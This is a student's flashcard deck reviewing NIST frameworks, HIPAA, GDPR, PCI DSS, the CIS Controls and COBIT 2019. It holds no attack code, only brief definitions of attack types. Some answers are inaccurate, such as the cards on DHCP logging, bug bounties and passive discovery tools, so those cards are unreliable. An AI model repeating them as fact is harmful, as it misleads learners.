S1, M1-M5 Flashcards
(175 cards)
1
Q
What does NIST stand for?
A
National Institute of Standards and Technology
2
Q
When was NIST established?
A
1901
3
Q
Why was NIST initially established?
A
to promote US research
4
Q
When did NIST branch out into cybersecurity?
A
1995
5
Q
What are the three most important NIST frameworks?
A
- Cybersecurity Framework
- Privacy Framework
- SP 800-53 Security and Privacy Controls for Information Systems and Organizations
6
Q
Is NIST CSF a voluntary or required framework?
A
voluntary
7
Q
What are the three primary components of the NIST CSF?
A
- Core
- Tiers
- Organizational Profiles
8
Q
What is the focus of the CSF Core (NIST)?
A
provides ways to reduce cybersecurity risk by enhancing cybersecurity protection
9
Q
What does the NIST CSF Core consist of?
A
six functions
10
Q
What are the six functions of the NIST CSF Core?
A
Govern, Identify, Protect, Detect, Respond, Recover
11
Q
Which of the six NIST CSF functions touches all other functions?
A
govern (because you need oversight over all of it)
12
Q
T/F: NIST CSF Core functions represent ordered steps.
A
False, they should all be done concurrently (simultaneously).
13
Q
What is the focus of Identify (NIST)?
A
understand assets, risks, and improvement opportunities (AIR)
14
Q
What is the focus of Protect (NIST)?
A
secure assets to prevent or reduce the likelihood and impact of adverse cybersecurity events
15
Q
What is the focus of Detect (NIST)?
A
discover cybersecurity attacks and incidents quickly (timely)
16
Q
What is the focus of Respond (NIST)?
A
contain the effects of cybersecurity incidents
17
Q
What is the focus of Recover (NIST)?
A
restoration of company’s normal operations
18
Q
What is the key difference between Respond and Recover for NIST?
A
Respond deals with how you contain an attack and respond in real time to deal with it.
Recover deals with how you return to normal business operations after the attack has been contained.
19
Q
Is a locked door on a house a preventative or detective measure?
A
preventative (it stops an attacker from getting in)
20
Q
Is a security camera on a house a preventative or detective measure?
A
It is more traditionally a detective measure, but it can also be preventative in that it deters the attacker from wanting to rob that house.
21
Q
T/F: NIST CSF Tiers are a means to implement the six functions.
A
False, they are just a categorization mechanism.
22
Q
What do the NIST CSF Tiers do?
A
measure the sophistication of an organization’s information security infrastructure
23
Q
How many CSF Tiers are there?
A
4
24
Q
What are the four CSF Tiers?
A
Partial
Risk-Informed
Repeatable
Adaptive
25
What are the CSF Tiers further divided by?
Cybersecurity Risk Governance and Cybersecurity Risk Management
26
What does a CSF Organizational Profile do?
defines what success looks like for your unique cybersecurity needs
27
What are the two types of organizational profiles (NIST CSF)?
Current and Target
28
What is a current profile (NIST CSF)?
outcome that organization is achieving (or attempting to achieve) based on the *current cybersecurity posture*
29
What is a target profile (NIST CSF)?
*desired outcome* that organization has prioritized achieving, considering anticipated changes to its cybersecurity posture
30
What is a community profile (NIST CSF)? What are they commonly used for?
baseline outcomes developed by industry, which are used to create target profiles
31
What is the acronym to remember the 5-step approach to use Organizational Profiles to continuously improve cybersecurity posture?
Some Guy Created AI
32
What does "Some Guy Created AI" stand for (5-step approach)?
1. Scope the Organizational Profile
2. Gather information to create the org profile
3. Create the org profile
4. Analyze gaps between current and target and create an action plan
5. Implement action plan and update the org profile
33
T/F: The NIST Privacy Framework was designed to be applied to any industry.
True.
34
Which functions are unique to the cybersecurity framework (NIST CSF)?
Detect, Respond, Recover
35
Which functions are unique to the NIST Privacy Framework?
Control, Communicate
36
Which functions are shared between the NIST CSF and privacy frameworks?
Govern, Identify, Protect
37
What does the Privacy Framework aim to do?
protect individual's data as used in data processing applications
38
What is the difference between "control" and "protect" in the NIST Privacy Framework?
Control deals with how you *manage data processing* to reduce privacy risks.
Protect deals with safeguards in place to *protect data.*
39
What are the differences between NIST Organizational Profiles for the CSF and Privacy Framework?
None, they are the same.
40
What are the differences between NIST Tiers for the CSF and Privacy Framework?
None, they are the same.
41
NIST Security and Privacy Controls are the standard for what types of information security systems?
federal
42
Which of the three NIST frameworks imposes the strictest standards?
NIST Security and Privacy Controls
43
Which types of companies are more likely to use the NIST SP 800-53?
sophisticated, large companies with a large budget
44
The NIST SP 800-53 satisfies which two security and privacy requirements?
- OMB Circular A130
- FISMA
45
What are three control implementation approaches (names only)?
- Common (Inheritable)
- System-Specific
- Hybrid
46
What is the common (inheritable) control implementation approach?
implement controls across the *entire organization*
47
What is the system-specific control implementation approach?
implement controls at the information-system level
48
What is the hybrid control implementation approach?
some controls are implemented at the organizational level and others at the information-system level
49
What is a data breach?
exposure of *confidential information* to *unauthorized persons*
50
What are the two categories of data breaches?
- unintentional
- intentional
51
What are the two rules under HIPAA?
Privacy Rule, Security Rule
52
The HIPAA Privacy Rule governs the privacy of what type of data?
protected health information (PHI)
53
What is a healthcare clearing house?
institution that electronically transmits different types of medical claims data to insurance carriers
54
You are usually a covered entity under HIPAA if you ...
handle protected health information (PHI).
55
The HIPAA Security rule specifically governs what type of PHI?
electronic
56
Under the Security rule (HIPAA), covered entities must do what three things?
- ensure confidentiality, integrity, and availability of PHI
- protect against reasonably anticipated threats
- ensure compliance via training
57
What are three categories of safeguards under HIPAA?
Administrative, Physical, Technical
58
In what four ways did HITECH amend HIPAA? Which of these is the biggest?
- increased penalties for HIPAA violations
- required option for patients to obtain records in electronic form
- added "business associated" as a covered entity
- breach notification within 60 days of discovery * (biggest one)
59
Under GDPR, what are the two times when it is lawful to process personal data?
proper consent or complying with legal obligation
60
Are data processors that are based in the EU but actually process outside of the EU subject to GDPR?
Yes.
61
When are data processors outside of the EU subject to GDPR?
(1) offering goods/services to those in the EU
(2) monitoring behavior of those in the EU
(3) EU law applies via public international law (embassies)
62
What are the six principles that must be followed when processing data (GDPR)?
- Lawfulness, Fairness, Transparency
- Purpose Limitation
- Data Minimization
- Accuracy
- Storage Limitation
- Integrity and Confidentiality
63
When is it okay to use data beyond the allowed purposes or to keep it longer than needed under GDPR?
public interest archiving, scientific or historical research, or statistical purposes
64
Data subject to the PCI DSS includes what two categories of data? Collectively, what are these two categories of data called?
- cardholder data (info on the card)
- sensitive authentication data (PIN)
called "account data"
65
How often should external vulnerability scanning occur under PCI DSS?
quarterly
66
Who initially developed CIS controls? Who are they supported by now?
developed by an international consortium, supported by SANS Institute
67
What are the CIS controls?
recommended actions, processes, and best practices to strengthen cybersecurity defenses
68
The CIS controls were designed with what three principles in mind? Elaborate on these.
- Context (examples and explanations)
- Coexistence (align with other frameworks)
- Consistency (uniformly applied across organization)
69
What is used to tailor the implementation of CIS Controls to an organization's size?
implementation groups
70
How many implementation groups are there (CIS Controls)?
3
71
How do the three implementation groups map to the tiers for NIST?
Tier 1 and 2 -> IG1
Tier 3 -> IG2
Tier 4 -> IG3
72
What does Control 1: Inventory and Control of Enterprise Assets entail?
understand the totality of IT assets
73
What is more sophisticated, an active or a passive asset discovery tool?
passive
74
What is DHCP logging?
assigns local/private IP addresses to all devices on a network
75
What does Control 2: Inventory and Control of Software Assets entail?
track and actively manage all software applications so that only authorized software is installed on company devices
76
What are allowlist authorized libraries?
ensure that only *specific files* can be loaded into a system process
77
What are allowlist authorized scripts?
ensure that only *authorized lines of code* can be executed
78
Data classification labels are assigned based on _____.
sensitivity
79
What does Control 3: Data Protection entail?
securely manage entire life cycle of data
80
What does Control 4: Secure Configuration of Enterprise Assets and Software entail?
establish and maintain secure baseline configurations for assets
81
Why are many applications sold pre-configured with default settings?
designed for ease of installation or usage
82
What is the risk of default configurations?
Since hackers know these defaults, they present vulnerabilities.
83
What is one of the things you should change from the default configuration?
change default passwords/logins
84
What is security hardening?
strengthening a system's defenses against cyberattacks by reducing its vulnerability
85
What does Control 5: Account Management entail?
tools to manage credentials and authorization for user accounts
86
What is a best practice regarding administrative accounts?
The end user should have *separate accounts* for their regular tasks and and for administrative actions, since admin accounts are more likely to be targeted for attack.
87
What does single-sign on do?
use a single log-in to authenticate across multiple applications
88
What does Control 6: Access Control Management entail?
specifying the *type of access* user accounts should have
89
What two principles should be followed when determining the level of access for a person?
1. least privilege
2. need-to-know
90
What is the key difference between account management and access control management?
Account management is about making and maintaining accounts. Access control management is about determining the level of access each account gets.
91
What does Control 7: Continuous Vulnerability Management entail?
continuously identifying and tracking vulnerabilities within infrastructure to remediate weak points
92
What is a zero-day exploit?
unknown vulnerabilities with no known solution
93
What does Control 8: Audit Log Management entail?
log management process to be alerted of and recover from an attack in real time
94
What are the two categories of logs?
1. system logs
2. audit logs
95
What are system logs? What are some examples of things recorded?
provide a list of events (start and end times, crashes, restoration)
96
What are audit logs? What are some examples of things recorded?
tied to a specific user (log in and out, access a file, open an application)
97
What does Control 9: Email and Web Browser Protections entail?
detect and protect against cybercrime attempted through email or the internet by directly engaging employees
98
What is URL filtering?
restricting access to certain websites
99
What does Control 10: Malware Defenses entail?
prevent the installation and propogation of malware onto company assets and its network
100
Malware is defined (broadly/narrowly).
broadly (anything bad on your computer)
101
Malware frequently relies on what?
insecure end-user behavior (humans making dumb choices)
102
What should be done about software auto-run/auto-play features?
They should be disabled.
103
What is living-off-the-land?
when a hacker uses an organization's existing tools against itself
104
What does Control 11: Data Recovery entail?
*data* backup, testing, and *restoration* processes to recover assets to a pre-incident state
105
Ideally, where should data backups be stored?
off-site in a different geographical location
106
The data backup process should be (manual/automatic).
automatic
107
What does Control 12: Network Infrastructure Management entail?
managing and securing a company's network infrastructure
108
T/F: Network Infrastructure includes only physical devices.
False, it includes virtual devices as well.
109
What can commercial tools for network infrastructure management do?
provide a *sanity check* every time a change is made to ensure that hardware/software works flawlessly
110
What does Control 13: Network Monitoring and Defense entail?
monitoring and defending a network infrastructure against internal and external security threats
111
What must the company do with respect to network monitoring and defense software solutions that are pre-purchased?
fine-tune them to the organization's needs
112
What are two of the most common ways networks can be attacked?
- Denial of Service (DoS)
- Ransomware
113
What is a Denial of Service attack?
overwhelm a company's network by flooding it with illegitimate requests, rendering it useless
114
What should be used to mitigate DoS and ransomware attacks?
event logging and alerting mechanisms
115
What is unique about network infrastructure management and network monitoring and defense in relation to the implementation groups?
These are rather advanced functions, so there are few (almost none) that apply to IG1.
116
What is the difference between Control 12 (Network Infrastructure Mangement) and Control 13 (Network Monitoring and Defense)?
Infrastructure management deals with managing the devices in your network in a secure way.
Monitoring deals with detecting and responding to suspicious activity in the network.
117
Which CIS Control includes controls like collecting network traffic flow logs, managing access controls for remote assets, and centralizing security event alerting?
Network Monitoring and Defense
118
Which CIS Control includes controls like securely managing network infrastructure, ensuring network infrastructure is up-to-date, and establishing and maintaining a secure network architecture?
Network Infrastructure Management
119
What does Control 14: Security Awareness and Skills Training entail?
establish a security awareness and training program to reduce cybersecurity risk
120
What is unique about security awareness and skills training in relation to the implementation groups?
The safeguards apply to pretty much all groups; all IGs should be implementing this.
121
What does Control 15: Service Provider Management entail?
evaluate third-party service providers with access to sensitive data or responsibility for the company's IT functions
122
What does Control 16: Application Software Security entail?
manage the entire life cycle of software that is acquired, hosted, or developed in-house
123
Are software development life cycles becoming shorter or longer?
shorter
124
What is causing software development life cycles to become more complex?
They are aggregations of code from various sources.
125
What is cross-site scripting?
injecting content and code into a website to take it over
126
What is a SQL injection?
uses a SQL query to extract or corrupt data
127
What are race conditions?
when 2+ apps share the same data, so an attacker races to get to the data first by manipulating the order of events
128
When should application security be introduced in the SDLC?
as early as possible
129
What is a bug bounty problem?
employees get paid to find flaws in company software
130
T/F: Application Software Security should be implemented by all implementation groups.
False, this is too advanced for IG1 to implement at all.
131
What does Control 17: Incident Response Management entail?
establish an incident response management program to detect, respond, and prepare for potential attacks
132
What is a fire drill?
testing the incident response process
133
What does Control 18: Penetration Testing entail?
test the sophistication of cybersecurity defenses by simulating actual attacks
134
How does Penetration Testing differ from Vulnerability Management?
Penetration testing goes beyond identifying weaknesses to exploit the weak points and see what damage could be done.
135
What are Red Team exercises?
penetration tests
136
How often should penetration testing occur?
at least annually
137
Should all organizations conduct penetration testing?
No, it is too advanced for IG1 (small companies).
138
What was COBIT for before it became standards for IT governance and management?
a set of standards for IT auditors
139
What is the difference between governance and management?
Governance consists of the board, which oversees the strategic direction of the company.
Management manages the company on a daily basis (CEO, CFO, etc.).
140
What is a stakeholder?
anyone with a financial or business interest
141
What is the defining line between internal and external stakeholders?
Internal are the people inside the organization (board, management, employees).
External are the people outside the organization.
142
COBIT 2019 was developed using that 5 things?
1. COBIT 5
2. Six Principles for Governance System
3. Three Principles for Governance Framework
4. Other Standards and Regulations
5. Community Contribution
143
A governance system should create value for company stakeholders by balancing what two things?
benefits and risks
144
T/F: There is no such thing as "one size fits all" in governance systems.
True.
145
What does it mean that governance frameworks should be based on a conceptual model?
They should identify *key components* as well as relationships between those components to provide greater *automation* and *maximize consistency*.
146
What is the relationship between a goal and an objective?
You set a goal first, then create objectives that can be met to help you achieve the goal.
147
In the COBIT Model, governance objectives are grouped into how many domains?
1
148
In the COBIT Model, management objectives are grouped into how many domains?
4
149
What is the single domain for governance objectives (COBIT 2019)?
evaluate, direct, and monitor (EDM)
150
What are the four management domains for management objectives (COBIT 2019)? Use the acronyms only.
APO, BAI, DSS, MEA
151
What does APO stand for (COBIT)?
align, plan, and organize
152
What is one of the most significant objectives within APO?
managed data
153
What does BAI stand for (COBIT)?
build, acquire, implement
154
What does DSS stand for (COBIT)?
deliver, service, support
155
What does MEA stand for (COBIT)?
monitor, evaluate, assess
156
What management domain touches all other domains?
MEA (monitor, evaluate, assess)
157
What are components in a governance system?
collectively or individually contribute to the *successful execution* of the governance system
158
What are the seven components to satisfy management and governance objectives (COBIT)?
Processes
Organizational Structures
Principles, Policies, Frameworks
Information
Culture, Ethics, Behavior
People, Skills, Competencies
Services, Infrastrucure, and Applications
159
What is the relationship between strategy and goals?
goals support the strategy
160
What are the four balanced scorecard dimensions?
- financial
- customer
- internal
- growth
161
What is a risk profile?
It represents your appetite for risk.
162
What are the two categories for the threat landscape?
normal or high
163
What are the three categories for compliance requirements?
low, normal, and high
164
What is low/normal/high measured relative to for compliance requirements?
relative to the industry
165
What are the four roles of IT (design factors)?
Support, Factory, Turnaround, Strategic
166
What does a support role for IT mean?
IT system is not critical for operating a business or maintaining continuity
167
What does a factory role for IT mean?
IT system will impact business operations and continuity if it fails
168
What does a turnaround role for IT mean?
drives innovation for business, but not required for critical business operations
169
What does a strategic role for IT mean?
IT system is crucial for innovation and business operations
170
What are the three technology adoption strategies?
first mover, follower, slow adopter
171
What are the four IT implementation methods?
Agile, waterfall, DevOps, hybrid
172
What are two enterprise sizes under Design Factors?
- large companies (more than 250 FT employees)
- small/medium companies (50 to 250 FT employees)
173
What do COBIT publications do?
give you the directions/instructions to achieve customization
174
What are the four COBIT publications to be used?
COBIT Framework: Introduction and Methodology
COBIT Framework: Governance and Management Objectives
COBIT Design Guide
COBIT Implementation Guide
175
The COBIT Implementation Guide should be used in conjunction with what other publication?
COBIT Design Guide
